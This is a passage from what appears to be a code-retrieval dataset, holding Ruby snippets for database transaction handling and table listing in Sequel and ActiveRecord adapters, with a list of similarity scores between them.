"def set_transaction_isolation(conn, opts)\n level = opts.fetch(:isolation, transaction_isolation_level)\n read_only = opts[:read_only]\n deferrable = opts[:deferrable]\n if level || !read_only.nil? || !deferrable.nil?\n sql = String.new\n sql << \"SET TRANSACTION\"\n sql << \" ISOLATION LEVEL #{Sequel::Database::TRANSACTION_ISOLATION_LEVELS[level]}\" if level\n sql << \" READ #{read_only ? 'ONLY' : 'WRITE'}\" unless read_only.nil?\n sql << \" #{'NOT ' unless deferrable}DEFERRABLE\" unless deferrable.nil?\n log_connection_execute(conn, sql)\n end\n end",
"def commit_db_transaction() end",
"def commit_db_transaction() end",
"def transaction(&block)\n ActiveRecord::Base.transaction(&block)\n end",
"def begin_db_transaction\n # PG driver doesn't really do anything on setAutoCommit(false)\n # except for commit-ing a previous pending transaction if any\n log('/* BEGIN */') { @connection.begin }\n end",
"def rollback_db_transaction() end",
"def rollback_db_transaction() end",
"def with_transaction(&block)\n base_model.transaction(&block)\n end",
"def checked_transaction(opts=OPTS)\n use_transaction?(opts) ? db.transaction({:server=>this_server}.merge!(opts)){yield} : yield\n end",
"def checked_transaction(opts=OPTS)\n use_transaction?(opts) ? db.transaction({:server=>this_server}.merge!(opts)){yield} : yield\n end",
"def transaction(opts={:auto_enable => false})\n @transaction_level||=0\n @transaction_level+=1\n session do\n raise_if_transaction_running\n @transaction ||= true\n raise Error.cannot_obtain_transaction_lock if not lock_transaction\n begin\n yield\n # get_transaction in case cfgsave or cfgenable was run in transaction block\n # if there is no transaction we do not need to run it\n # if there is transaction but opend by someone else then t\n cfg_save if @transaction_level==1 && get_transaction\n rescue => e\n abort_transaction\n raise e\n end \n end\n ensure\n @transaction_level-=1\n @transaction = nil if @transaction_level==0\n end",
"def within_transaction(object); end",
"def ddl_transaction(migration)\n if use_transaction?(migration)\n ActiveRecord::Base.transaction { yield }\n else\n yield\n end\n end",
"def begin_transaction(conn, opts={})\n set_transaction_isolation(conn, opts)\n super\n end",
"def supports_transactional_ddl?\n true\n end",
"def with_transaction(read_only: false, &block)\n @env.transaction(read_only, &block)\n end",
"def in_transaction(opts = {})\n yield\n end",
"def transaction(&block)\n yield\n end",
"def transaction(&block)\n yield\n end",
"def locked_transaction(&block)\n unless connection.open_transactions.zero?\n raise \"locked_transaction cannot be called from within another transaction!\"\n end\n unsafe_locked_transaction do\n yield if block_given?\n end\n end",
"def transaction(&block)\n @@semaphore.synchronize{\n block.call\n }\n end",
"def begin_db_transaction\n log('begin transaction', nil) do\n begin_isolated_db_transaction(default_transaction_isolation)\n end\n end",
"def create_or_update_with_transaction\n Assessment.transaction do\n create_or_update_without_transaction\n end\n end",
"def supports_transactional_ddl?\n false\n end",
"def supports_prepared_transactions?\n false\n end",
"def transaction(session, access_mode = :write)\n if !block_given?\n tx = self.class.transaction_class.new(session)\n tx.access_mode = access_mode\n tx.begin\n return tx\n end\n\n begin\n tx = transaction(session, access_mode)\n yield tx\n rescue => e\n tx.mark_failed if tx\n raise e\n ensure\n tx.close if tx\n end\n end",
"def transaction(&block)\n db\n persister\n\n result = nil\n start_time = Time.now\n begin\n db.transaction(:rollback => :reraise, :isolation => :repeatable,\n :retry_on => @retry_on_error, :num_retries => 3) do\n result = yield block\n end\n total = Time.now.to_ms - start_time.to_ms\n debug \"Transaction committed (#{total} ms)\"\n result\n rescue StandardError => e\n total = Time.now.to_ms - start_time.to_ms\n warn \"Transaction failed (#{total} ms)\"\n raise e\n ensure\n GC.start\n end\n end",
"def begin_db_transaction\n execute(\"BEGIN\")\n end",
"def begin_db_transaction\n execute(\"BEGIN\")\n end",
"def transaction(options={}, &block)\n connection.transaction(options.update(:requires_new => true), &block)\n end",
"def outside_transaction\n # ActiveRecord manages connections per-thread, so the only way to\n # convince it to open another connection is to start another thread.\n thread = Thread.new do\n begin\n yield\n end\n end\n thread.value\n end",
"def set_transaction_isolation(conn, opts)\n level = opts.fetch(:isolation, transaction_isolation_level)\n if (jdbc_level = JDBC_TRANSACTION_ISOLATION_LEVELS[level]) &&\n conn.getMetaData.supportsTransactionIsolationLevel(jdbc_level)\n _trans(conn)[:original_jdbc_isolation_level] = conn.getTransactionIsolation\n log_connection_yield(\"Transaction.isolation_level = #{level}\", conn){conn.setTransactionIsolation(jdbc_level)}\n end\n end",
"def transaction(opts = {})\n commit, rollback = start_transaction! opts\n tx_depth = nil\n begin\n if Pacer.verbose == :very\n tx_depth = threadlocal_graph_info[:dx_depth]\n puts \"--#{self.class.name} transaction #{ tx_depth } --> \"\n puts caller[0,3]\n end\n r = yield commit, rollback\n commit.call(false)\n r\n rescue Exception => e\n rollback.call e.message\n raise\n ensure\n puts \"--#{self.class.name} #{ tx_depth } <-- \" if Pacer.verbose == :very\n finish_transaction!\n end\n end",
"def transaction(&block)\n self['AutoCommit'] = false\n self.do_transaction(&block)\n self['AutoCommit'] = true\n end",
"def test_transaction_single_op1()\n conn = Scalaroid::TransactionSingleOp.new()\n conn.close_connection()\n end",
"def start_transaction!\n fail DbMod::Exceptions::AlreadyInTransaction if @in_transaction\n @in_transaction = true\n\n query 'BEGIN'\n end",
"def exec_rollback_db_transaction\n @connection.rollback\n @connection.autocommit = true\n end",
"def transaction\n raise ArgumentError, 'No block was given' unless block_given?\n\n with_client do |client|\n begin\n client.query('BEGIN')\n yield client\n client.query('COMMIT')\n rescue StandardError => e\n client.query('ROLLBACK')\n raise e\n end\n end\n end",
"def testTransactionSingleOp1()\n conn = Scalaris::TransactionSingleOp.new()\n conn.close_connection()\n end",
"def testTransactionSingleOp1()\n conn = Scalaris::TransactionSingleOp.new()\n conn.close_connection()\n end",
"def test_transaction1()\n t = Scalaroid::Transaction.new()\n t.close_connection()\n end",
"def scaffold_transaction(&block)\n transaction(&block)\n end",
"def lint_transaction_support\n result = gateway_instance.transaction { 1 }\n\n complain \"#{gateway_instance} must return the result of a transaction block\" if result != 1\n\n gateway_instance.transaction do |t|\n t.rollback!\n\n complain \"#{gateway_instance} must interrupt a transaction on rollback\"\n end\n end",
"def transaction\n sanity_check\n raise InterfaceError, \"No block given\" unless block_given?\n\n commit\n begin\n yield self\n commit\n rescue Exception\n rollback\n raise\n end\n end",
"def transaction(&block)\n block.call\n end",
"def commit_transaction_sql\n SQL_COMMIT\n end",
"def commit_transaction_sql\n SQL_COMMIT\n end",
"def begin_transaction_sql\n SQL_BEGIN\n end",
"def begin_transaction_sql\n SQL_BEGIN\n end"
] |
[
"0.7294652",
"0.72276586",
"0.7209305",
"0.7209305",
"0.70683",
"0.699975",
"0.69545364",
"0.69545364",
"0.6950709",
"0.6950709",
"0.6924159",
"0.6880454",
"0.68508345",
"0.68450475",
"0.6827295",
"0.67907196",
"0.6744684",
"0.6744684",
"0.6744684",
"0.6701072",
"0.6701072",
"0.6660656",
"0.6650508",
"0.66397125",
"0.6625763",
"0.6625763",
"0.6625118",
"0.6612366",
"0.66026217",
"0.6599777",
"0.65828",
"0.6577545",
"0.6556991",
"0.64979583",
"0.64602906",
"0.6458438",
"0.64489406",
"0.6408846",
"0.6407302",
"0.63959855",
"0.638133",
"0.63756317",
"0.6370918",
"0.6344547",
"0.63113153",
"0.6306036",
"0.6301762",
"0.62911433",
"0.6287692",
"0.6279948",
"0.6275571",
"0.6271097",
"0.62569577",
"0.62569577",
"0.62506515",
"0.62503135",
"0.622293",
"0.622293",
"0.621971",
"0.62162894",
"0.62162894",
"0.6215919",
"0.6208216",
"0.61911637",
"0.618761",
"0.61767846",
"0.61713696",
"0.61686397",
"0.61636716",
"0.61636716",
"0.61629426",
"0.60825026",
"0.6048111",
"0.6034665",
"0.6019471",
"0.6018151",
"0.60181415",
"0.6009271",
"0.6005047",
"0.6005047",
"0.5981113",
"0.5980937",
"0.59787434",
"0.5975502",
"0.59700763",
"0.59601295",
"0.5955306",
"0.59483445",
"0.5933916",
"0.59137905",
"0.59137905",
"0.59009737",
"0.588837",
"0.58642447",
"0.5862583",
"0.58606905",
"0.5843217",
"0.5843217",
"0.5836062",
"0.5836062"
] |
0.7193443
|
4
|
PostgreSQL supports transactional DDL statements.
|
def supports_transactional_ddl?
true
end
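
A brief aside on this record: PostgreSQL can execute DDL (CREATE/ALTER/DROP) inside a transaction, which is what this predicate advertises; in Sequel, the same-named predicate is what the migrator consults by default to decide whether to wrap a migration in a transaction. A minimal sketch of one way a caller might act on the flag — with_ddl_transaction, conn, and adapter are hypothetical names, not part of this record:

def with_ddl_transaction(conn, adapter)
  # Adapters without transactional DDL (e.g. MySQL) auto-commit each
  # DDL statement, so there is nothing to roll back: just run the block.
  return yield unless adapter.supports_transactional_ddl?
  conn.exec("BEGIN")
  begin
    result = yield
    conn.exec("COMMIT")
    result
  rescue StandardError
    # On PostgreSQL this also undoes any DDL executed so far.
    conn.exec("ROLLBACK")
    raise
  end
end
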
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def supports_transactional_ddl?\n false\n end",
"def begin_db_transaction\n execute(\"BEGIN\")\n end",
"def begin_db_transaction\n execute(\"BEGIN\")\n end",
"def supports_ddl_transactions?\n false\n end",
"def supports_ddl_transactions?\n false\n end",
"def supports_ddl_transactions?\n false\n end",
"def ddl_transaction(migration)\n if use_transaction?(migration)\n ActiveRecord::Base.transaction { yield }\n else\n yield\n end\n end",
"def begin_transaction_sql\n SQL_BEGIN\n end",
"def begin_transaction_sql\n SQL_BEGIN\n end",
"def commit_transaction_sql\n SQL_COMMIT\n end",
"def commit_transaction_sql\n SQL_COMMIT\n end",
"def transaction; end",
"def transaction; end",
"def transaction; end",
"def scaffold_transaction(&block)\n transaction(&block)\n end",
"def begin_db_transaction\n # PG driver doesn't really do anything on setAutoCommit(false)\n # except for commit-ing a previous pending transaction if any\n log('/* BEGIN */') { @connection.begin }\n end",
"def rollback_db_transaction() end",
"def rollback_db_transaction() end",
"def commit_db_transaction\n execute(\"COMMIT\")\n end",
"def commit_db_transaction\n execute(\"COMMIT\")\n end",
"def begin_db_transaction() end",
"def begin_db_transaction() end",
"def create_products_table\n c = PGconn.new(:host => \"localhost\", :dbname => dbname)\n c.exec %q{\n CREATE TABLE products (\n id SERIAL PRIMARY KEY,\n name varchar(255),\n price decimal,\n description text\n );\n }\n c.close\nend",
"def TransactionBegin()\n\t@dbh.do(\"BEGIN\")\nend",
"def exec_rollback_db_transaction\n @connection.rollback\n @connection.autocommit = true\n end",
"def begin_db_transaction\n @connection.autocommit = false\n end",
"def commit_db_transaction() end",
"def commit_db_transaction() end",
"def prepare_db_for_restore\n raise \"restore unimplemented for #{adapter}\" unless (adapter = @db_conf[:adapter]) == 'postgresql'\n query = \"SELECT table_name FROM information_schema.tables WHERE table_schema='public' AND table_type='BASE TABLE'\"\n cmd = \"psql #{@db_conf[:database]} -t -c \\\"#{query}\\\"\"\n puts \"Executing: '#{cmd}'\"\n tables = `#{cmd}`\n\n query = \"DROP TABLE #{tables.map(&:chomp).map(&:strip).reject(&:empty?).join(\", \")} CASCADE\"\n cmd = \"psql #{@db_conf[:database]} -t -c \\\"#{query}\\\"\"\n puts \"Executing: '#{cmd}'\"\n `#{cmd}`\n end",
"def create_table\n puts \"Creating table >> PEOPLE\"\n $db.execute %q{\n CREATE TABLE people(\n id integer primary key,\n name varchar(50),\n job varchar(50),\n gender varchar(6),\n age integer\n )\n }\nend",
"def create_database\n $conn.exec(\"\"\"\n CREATE TABLE users (\n id SERIAL NOT NULL,\n name varchar(255) NOT NULL,\n created_at timestamp NOT NULL,\n PRIMARY KEY (id)\n );\n CREATE UNIQUE INDEX user_names ON users (name);\n CREATE TABLE blathers (\n id SERIAL NOT NULL,\n text varchar(141) NOT NULL,\n created_at timestamp NOT NULL,\n user_id integer NOT NULL,\n PRIMARY KEY (id)\n );\n CREATE TABLE blathers_mentioned_users (\n blather_id integer NOT NULL,\n user_id integer NOT NULL,\n PRIMARY KEY (blather_id, user_id)\n );\n \"\"\")\nend",
"def test_transactions(table=\"test_monetdb_transactions\", columndefs=['col1 INT', 'col2 VARCHAR(255)'])\n test_create_table(table, columndefs)\n \n data = [1, 'aa'] \n values = \"\"\n \n data.each do |d| values += '\\'' + d.to_s + '\\'' + ',' end\n values = values.chop # remove last ',' character \n \n insert = \"INSERT INTO \" + table + \" VALUES \" + \" ( \" + values + \" )\"\n \n @db.query('START TRANSACTION')\n @db.auto_commit(flag=false) # if @db.auto_commit?\n @db.query(insert)\n\n @db.query(\"COMMIT\") \n \n res = @db.query('SELECT * FROM ' + table)\n rows_committed = res.fetch_all\n res.free\n \n # create a save point\n @db.save\n @db.query(\"SAVEPOINT #{@db.transactions} ;\")\n \n @db.query(insert)\n \n # rollback to savepoint\n @db.query(\"ROLLBACK TO SAVEPOINT #{@db.transactions};\")\n @db.release\n \n res = @db.query('SELECT * FROM ' + table)\n rows_rolled_back = res.fetch_all\n res.free\n \n assert_equal(rows_committed, rows_rolled_back)\n \n # restore autocommit for remaining tests\n @db.auto_commit(flag=true) \n end",
"def on_prepare_transaction_commit(unit, transaction); end",
"def create_table\n puts \"Creating people table\"\n $db.execute %q{\n CREATE TABLE people(\n id integer primary key,\n name varchar(50),\n job varchar(50),\n gender varchar(6),\n age integer\n )\n }\nend",
"def transaction(&block); end",
"def use_transactions; end",
"def use_transactions; end",
"def within_transaction; end",
"def within_transaction; end",
"def create_schema\n puts \"Preparing table\"\n\n \tquery = <<-QUERY\n \t\tCREATE TABLE tasks (\n \t\t\tid INTEGER PRIMARY KEY,\n \t\t\ttitle TEXT NOT NULL,\n \t\t\tdescription TEXT,\n \t\t\tcompleted TEXT\n \t\t);\n \tQUERY\n db.execute(\"DROP TABLE IF EXISTS tasks;\")\n \tdb.execute(query)\n\n puts \"Table creation completed!\"\n\n end",
"def restart_transaction\n ActiveRecord::Base.connection.execute(\"COMMIT\")\n ActiveRecord::Base.connection.execute(\"BEGIN\")\n end",
"def rollback_db_transaction\n execute(\"ROLLBACK\")\n end",
"def rollback_db_transaction\n execute(\"ROLLBACK\")\n end",
"def transaction(options={}, &block)\n connection.transaction(options.update(:requires_new => true), &block)\n end",
"def initial_commit?; end",
"def initial_commit?; end",
"def transaction(&block)\n yield\n commit\n end",
"def transaction\n start\n yield self\n rescue Object => ex\n rollback\n debug \"#{ex.class}: #{ex.message}\"\n ex.backtrace.each { |line| debug line }\n else\n commit\n end",
"def transaction(start_db_transaction=true)\n yield\n end",
"def begin_db_transaction\n @transaction = @connection.transaction('READ COMMITTED')\n end",
"def create_movies_table\n c = PGconn.new(:host => \"localhost\", :dbname => \"test\")\n c.exec %q{\n CREATE TABLE movies (\n id PRIMARY KEY,\n title TEXT,\n description TEXT,\n rating INTEGER\n );\n }\n c.close\nend",
"def rollback_transaction_sql\n SQL_ROLLBACK\n end",
"def rollback_transaction_sql\n SQL_ROLLBACK\n end",
"def commit_transaction(tx)\n tx.execute\n end",
"def install_on(db, options = {})\n execute_ddl(db, 'BEGIN', options)\n all_objects_in_order.each{|o| \n sql = o.to_create_sql(db)\n execute_ddl(db, sql, options) unless sql.nil? or sql.empty?\n }\n execute_ddl(db, 'COMMIT', options)\n db\n end",
"def lint_transaction_support\n result = gateway_instance.transaction { 1 }\n\n complain \"#{gateway_instance} must return the result of a transaction block\" if result != 1\n\n gateway_instance.transaction do |t|\n t.rollback!\n\n complain \"#{gateway_instance} must interrupt a transaction on rollback\"\n end\n end",
"def begin_db_transaction\n log('BEGIN', 'TRANSACTION') { @connection.begin }\n end",
"def replace_statement(target, stage)\n <<-SQLREPLACE\n begin transaction;\n drop table #{target};\n alter table #{stage} rename to #{target};\n end transaction;\n SQLREPLACE\n end",
"def create_table(name, &block)\n DB.drop_table? name if @opts.drop_tables?\n DB.create_table? name.to_sym, &block\n info \"Setup database table: #{name}\"\n end",
"def commit; end",
"def commit; end",
"def commit; end",
"def start_transaction!\n fail DbMod::Exceptions::AlreadyInTransaction if @in_transaction\n @in_transaction = true\n\n query 'BEGIN'\n end",
"def create_table!(*args, &block)\n drop_table?\n create_table(*args, &block)\n end",
"def spanner_create_table_with_foreign_key_delete_cascade project_id:, instance_id:, database_id:\n db_admin_client = Google::Cloud::Spanner::Admin::Database.database_admin\n\n database_path = db_admin_client.database_path project: project_id,\n instance: instance_id,\n database: database_id\n\n job = db_admin_client.update_database_ddl database: database_path, statements: [\n %{ CREATE TABLE Customers (\n CustomerId INT64 NOT NULL,\n CustomerName STRING(62) NOT NULL,\n ) PRIMARY KEY (CustomerId)},\n %{ CREATE TABLE ShoppingCarts (\n CartId INT64 NOT NULL,\n CustomerId INT64 NOT NULL,\n CustomerName STRING(62) NOT NULL,\n CONSTRAINT FKShoppingCartsCustomerId FOREIGN KEY (CustomerId)\n REFERENCES Customers (CustomerId) ON DELETE CASCADE\n ) PRIMARY KEY (CartId)}\n ]\n\n puts \"Waiting for operation to complete...\"\n job.wait_until_done!\n puts \"Created Customers and ShoppingCarts table with FKShoppingCartsCustomerId \\\n foreign key constraint on database #{database_id} on instance #{instance_id}\"\nend",
"def drop_sequence_sql(name)\n \"DROP SEQUENCE #{name}\"\n end",
"def exec_rollback_db_transaction\n log('ROLLBACK', 'TRANSACTION') { @connection.rollback }\n end",
"def commit( transaction )\n fail NotImplementedError\n end",
"def drop_movies_table\n c = PGconn.new(:host => \"localhost\", :dbname => \"testdb\")\n c.exec \"DROP TABLE products;\"\n c.close\nend",
"def create!(con)\n con.exec create_stmt\n end",
"def transaction(object)\n object.db.transaction {raise ::Sequel::Error::Rollback unless yield}\n end",
"def ddl(string) # :nodoc:\n chk_conn\n execute(string)\n end",
"def commit_db_transaction\n @connection.commit\n @connection.autocommit = true\n end",
"def begin_transaction\n return System.begin_transaction\n end",
"def transaction(*sqls)\n begin\n db = SQLite3::Database.new(@@db_file)\n @@_set_db_handler.call(db)\n db.transaction do\n sqls.each do |sql|\n db.execute(sql)\n end\n end\n ensure\n db.close\n end\n end",
"def transaction(opts={}, &blk)\n Toshi.db.transaction(opts, &blk)\n end",
"def create_sync_state\n silence_ddl_notices(:left) do\n table_name = \"#{options[:rep_prefix]}_sync_state\"\n session.left.create_table \"#{options[:rep_prefix]}_sync_state\"\n session.left.add_column table_name, :table_name, :string\n session.left.add_column table_name, :state, :string\n session.left.remove_column table_name, 'id'\n session.left.add_big_primary_key table_name, 'id'\n end\n end",
"def begin\n db.transaction do\n yield\n end\n end",
"def create_authors(db)\r\n create_authors_cmd = <<-SQL\r\n CREATE TABLE IF NOT EXISTS authors(\r\n author_id INTEGER PRIMARY KEY,\r\n author_name VARCHAR(255)\r\n )\r\n SQL\r\n #create authors table\r\n db.execute(create_authors_cmd)\r\nend",
"def createUserTable\n @conn.exec(\"CREATEE users (id serial NOT NULL, name character varying(255), CONSTRAINT users_pkey PRIMARY KEY (id)) WITH (OIDS=FALSE);\");\n end",
"def create_table_sql(name, generator, options)\n a, b = super(name, generator, options), table_options_sql(options)\n \"#{a}\\n#{b}\"\n\t end",
"def postgresql_database\n # FIXME work in progress\n #encoding = \"-E #{configuration[:postgresql][:encoding]}\" if configuration[:postgresql][:encoding]\n encoding = ''\n template = \"-T #{configuration[:postgresql][:template_database]}\" if configuration[:postgresql][:template_database]\n\n exec \"postgresql_database\",\n :command => \"/usr/bin/createdb -O #{database_environment[:username]} #{encoding} #{template} #{database_environment[:database]}\",\n :unless => \"/usr/bin/psql -l | grep #{database_environment[:database]}\",\n :user => 'postgres',\n :require => exec('postgresql_user'),\n :before => exec('rake tasks')#,\n # :notify => exec('rails_bootstrap') # TODO make this configurable to work with multi_server\n end",
"def psql\n uri = generate_ingress_uri(\"Connecting\")\n ENV[\"PGPASSWORD\"] = uri.password\n ENV[\"PGSSLMODE\"] = 'require'\n system \"psql -U #{uri.user} -h #{uri.host} -p #{uri.port || 5432} #{uri.path[1..-1]}\"\n end",
"def create_book_condition(db)\r\n create_book_condition_cmd = <<-SQL\r\n CREATE TABLE IF NOT EXISTS book_condition(\r\n condition_id INTEGER PRIMARY KEY,\r\n condition_desc text(20)\r\n )\r\n SQL\r\n #create book_condition table\r\n db.execute(create_book_condition_cmd)\r\nend",
"def rollback_transaction(tx)\n # nothing to do\n end",
"def execute(sql, name = nil) \n # Only skip select statements from logging \n unless /^(select|show|begin|commit)/i.match(sql.strip) \n\t\tFile.open( File.join(RAILS_ROOT, 'db', 'ddl.sql'),'a') {|f|\n\t\t\ttemp_sql = sql.gsub(\"\\n\",\"\") \n\t\t\ttemp_sql = temp_sql + ';' if adapter_name != 'IBM_DB2' or adapter_name != 'IBM_DB'\n\t\t\tf.puts temp_sql\n\t\t}\n end\n\t old_execute sql, name\n end",
"def commit(transaction)\n raise NotImplementedError\n end",
"def transaction_disabled=(_arg0); end",
"def remove_transaction(conn)\n conn.setAutoCommit(true) if conn\n super\n end",
"def transaction(mode = :deferred, &block)\n @db.transaction(mode, &block)\n end",
"def create!(db, colls = nil)\n db.in_transaction do |conn|\n raise StandardError.new(\"Schema #{name} already created!\") unless schema_tables(conn).empty?\n end\n\n osm2pgsql_exec db, \"'#{empty_file}'\", \"creating osm2pgsql schema\"\n end",
"def init_conn_table(table_name)\n # Create destination table\n sql = <<SQL\ndrop table if exists #{table_name};\ncreate table #{table_name} (\n day timestamp, \n id int,\n value int,\n dw_created timestamp,\n dw_updated timestamp\n );\nSQL\n conn.run(sql)\n return conn\n end",
"def initDb\n @db.create_table! :tasks do\n primary_key :id\n Integer :created\n Integer :changed\n Integer :wake\n Integer :completed\n Integer :status\n String :title\n String :path\n String :data, :text=>TRUE\n end\n\n @db.create_table! :locks do\n Integer :id, :primary_key=>TRUE\n Integer :locked\n end\n end",
"def transaction(start_db_transaction = true)\n transaction_open = false\n begin\n if block_given?\n if start_db_transaction\n begin_db_transaction\n transaction_open = true\n end\n yield\n end\n rescue Exception => database_transaction_rollback\n if transaction_open\n transaction_open = false\n rollback_db_transaction\n end\n raise unless database_transaction_rollback.is_a? ActiveRecord::Rollback\n end\n ensure\n if transaction_open\n begin\n commit_db_transaction\n rescue Exception => database_transaction_rollback\n rollback_db_transaction\n raise\n end\n end\n end",
"def configure_postgres\n<<BASH\necho \"deb http://apt.postgresql.org/pub/repos/apt/ trusty-pgdg main\" > /etc/apt/sources.list.d/pgdg.list\nwget --quiet https://www.postgresql.org/media/keys/ACCC4CF8.asc\napt-key add ACCC4CF8.asc\napt-get update\napt-get install postgresql-9.2 -y\necho \"host all all #{CS_VM_ADDRESS}/32 md5\" >> /etc/postgresql/9.2/main/pg_hba.conf\necho \"listen_addresses='*'\" >> /etc/postgresql/9.2/main/postgresql.conf\nservice postgresql restart\nexport PATH=/usr/lib/postgresql/9.2/bin:$PATH\nsudo -u postgres psql -c \"CREATE USER bofh SUPERUSER ENCRYPTED PASSWORD 'i1uvd3v0ps';\"\nBASH\nend",
"def create_table_from_generator(name, generator, options)\n drop_statement, create_statements = create_table_sql_list(name, generator, options)\n (execute_ddl(drop_statement) rescue nil) if drop_statement\n create_statements.each{|sql| execute_ddl(sql)}\n end",
"def transaction\n start_transaction!\n\n result = yield\n\n query 'COMMIT'\n\n result\n rescue\n query 'ROLLBACK'\n raise\n\n ensure\n end_transaction!\n end",
"def drop_and_create_schema_migrations_table\n sql = [\n \"USE #{@database}\",\n 'DROP TABLE IF EXISTS schema_migrations',\n 'CREATE TABLE schema_migrations ( version varchar(255) COLLATE utf8_unicode_ci NOT NULL, UNIQUE KEY unique_schema_migrations (version)) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci'\n ]\n\n run_commands(sql)\n end",
"def rollback; end",
"def rollback; end"
] |
[
"0.7055532",
"0.69787323",
"0.69787323",
"0.68916005",
"0.68916005",
"0.68916005",
"0.6853812",
"0.6645684",
"0.6645684",
"0.6479298",
"0.6479298",
"0.64768124",
"0.64768124",
"0.64768124",
"0.6476242",
"0.6454384",
"0.6442726",
"0.6442726",
"0.6414321",
"0.6414321",
"0.6409704",
"0.6409704",
"0.64012444",
"0.6317183",
"0.62642574",
"0.624381",
"0.623209",
"0.623209",
"0.62139434",
"0.62116927",
"0.6184673",
"0.6161259",
"0.61471796",
"0.61436635",
"0.61263657",
"0.60702455",
"0.60702455",
"0.6064771",
"0.6064771",
"0.6033611",
"0.6014854",
"0.5990801",
"0.5990801",
"0.5981327",
"0.5955753",
"0.5955753",
"0.5951303",
"0.59511346",
"0.5929874",
"0.5927814",
"0.59186953",
"0.5909714",
"0.5909714",
"0.5891641",
"0.5873314",
"0.5868185",
"0.5848429",
"0.5848171",
"0.5827809",
"0.5824985",
"0.5824985",
"0.5824985",
"0.5815217",
"0.5807039",
"0.5793186",
"0.5792108",
"0.5787476",
"0.5779983",
"0.57721657",
"0.577139",
"0.5752157",
"0.5747943",
"0.57439953",
"0.5721898",
"0.5714632",
"0.5688772",
"0.5684309",
"0.56840247",
"0.56773275",
"0.5675763",
"0.56722283",
"0.56683373",
"0.5663497",
"0.56417316",
"0.56391805",
"0.5628432",
"0.56229854",
"0.56108844",
"0.5603816",
"0.55896443",
"0.5587215",
"0.5581341",
"0.5573446",
"0.5571338",
"0.5564642",
"0.55636364",
"0.55630124",
"0.55531996",
"0.55454576",
"0.55454576"
] |
0.725727
|
0
|
Array of symbols specifying table names in the current database. The dataset used is yielded to the block if one is provided; otherwise, an array of symbols of table names is returned. Options: :qualify :: Return the tables as Sequel::SQL::QualifiedIdentifier instances, using the schema the table is located in as the qualifier. :schema :: The schema to search. :server :: The server to use.
|
def tables(opts=OPTS, &block)
pg_class_relname(['r', 'p'], opts, &block)
end
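
For orientation: this is Sequel's postgres adapter enumerating tables from pg_class, where relkind 'r' marks ordinary tables and 'p' partitioned tables. A hedged usage sketch matching the docstring above, assuming DB is a Sequel postgres Database:

DB.tables                       # => [:albums, :artists]
DB.tables(:schema => :audit)    # restrict the search to one schema
DB.tables(:qualify => true)     # => Sequel::SQL::QualifiedIdentifier instances
DB.tables { |ds| ds.count }     # the underlying dataset is yielded to the block
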
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def tables\n table_names.map { |tn| table(tn) }\n end",
"def tables\n options.fetch(:tables)\n end",
"def tables(opts={})\n m = output_identifier_meth\n metadata_dataset.from(:information_schema__tables___t).\n select(:table_name).\n filter(:table_type=>'BASE TABLE', :table_schema=>(opts[:schema]||default_schema||'dbo').to_s).\n map{|x| m.call(x[:table_name])}\n end",
"def tables\n return enum_for(:tables) unless block_given?\n\n yield nil, rows\n end",
"def tables\n []\n end",
"def tables\n execute('select table_name from information_schema.tables where table_schema = ?', [schema]).map(&:first)\n end",
"def tables(opts={})\n execute('SHOW TABLES').map{|i| i.values}.reduce(:+).map{|i| i.to_sym}\n end",
"def tables\r\n conn_exec do |driver|\r\n if !@tables\r\n require \"#{File.dirname(__FILE__)}/drivers/#{@opts[:type]}/knjdb_#{@opts[:type]}_tables\" if (!@opts.key?(:require) or @opts[:require])\r\n @tables = Kernel.const_get(\"KnjDB_#{@opts[:type]}\".to_sym).const_get(:Tables).new(\r\n :db => self\r\n )\r\n end\r\n \r\n return @tables\r\n end\r\n end",
"def tables(name = nil)\n @connection.table_names\n end",
"def tables(name = nil, schema = nil, table = nil)\n schema = schema ? \"'#{quote_string(schema)}'\" : 'CURRENT_SCHEMA'\n select_rows(\n \"SELECT table_name \"+\n \"FROM information_schema.tables \"+\n \"WHERE table_type = 'TABLE' \"+\n \" AND table_schema = #{schema} \"+\n (table ? \"AND table_name = '#{quote_string(table)}'\" : \"\"),\n SCHEMA_LOG_NAME\n ).map { |row|\n row[0]\n }\n end",
"def tables_from(db=current_database)\n end",
"def tables\n @tables ||= if @registration[:tables].present?\n @registration[:tables].call(@connection)\n else\n @connection.tables\n end\n end",
"def tables(opts=OPTS, &block)\n tables_or_views('TABLE', opts, &block)\n end",
"def tables\n execute(\"SHOW TABLES FROM #{@opts[:database]}\")\n .map{ |i| i.values }\n .reduce(:+)\n .map{ |i| i.to_sym }\n end",
"def tables(name = nil)\n select_rows(<<-SQL, name).map { |row| row[0] }\nSELECT name\nFROM sysobjects\nWHERE type = 'U'\nSQL\n end",
"def compute_table_list\n if @configuration.download_tables\n # If the list is explicitly set then use that\n tables = @configuration.download_tables.to_set\n else\n # Otherwise guess via the tables actually in the database\n tables = @adapter.guess_tables.to_set\n\n if @configuration.allow_tables\n # Only allow tables tables that we specify\n tables = tables.intersection @configuration.allow_tables\n end\n if @configuration.disallow_tables\n # Remove any tables that we don't want included\n tables = tables.difference @configuration.disallow_tables\n end\n end\n return tables\n end",
"def tables\n db_connection.select_values(\"show tables\")\n end",
"def tables\n sanity_check\n @handle.tables\n end",
"def get_tables\n tables\n end",
"def tables(_name = nil)\n stmt = @connection.tables\n result = stmt.fetch_all || []\n stmt.drop\n\n result.each_with_object([]) do |row, table_names|\n schema_name, table_name, table_type = row[1..3]\n next if respond_to?(:table_filtered?) && table_filtered?(schema_name, table_type)\n table_names << format_case(table_name)\n end\n end",
"def tables(_name = nil)\n stmt = @connection.tables\n result = stmt.fetch_all || []\n stmt.drop\n\n result.each_with_object([]) do |row, table_names|\n schema_name, table_name, table_type = row[1..3]\n next if respond_to?(:table_filtered?) && table_filtered?(schema_name, table_type)\n table_names << format_case(table_name)\n end\n end",
"def tables\n [\n ]\n end",
"def tables()\n tables = []\n @client.query(\"SHOW TABLES;\").each do |table|\n tables.push(table.values[0])\n end\n\n tables\n end",
"def tables\n connection.list_tables.select { |table| !exclude?(table) }\n end",
"def tables\r\n return @engine.tables\r\n end",
"def tables(name = nil)\n if name\n ActiveSupport::Deprecation.warn(<<-MSG.squish)\n Passing arguments to #tables is deprecated without replacement.\n MSG\n end\n\n select_values(\"SELECT tablename FROM pg_tables WHERE schemaname = ANY(current_schemas(false))\", 'SCHEMA')\n end",
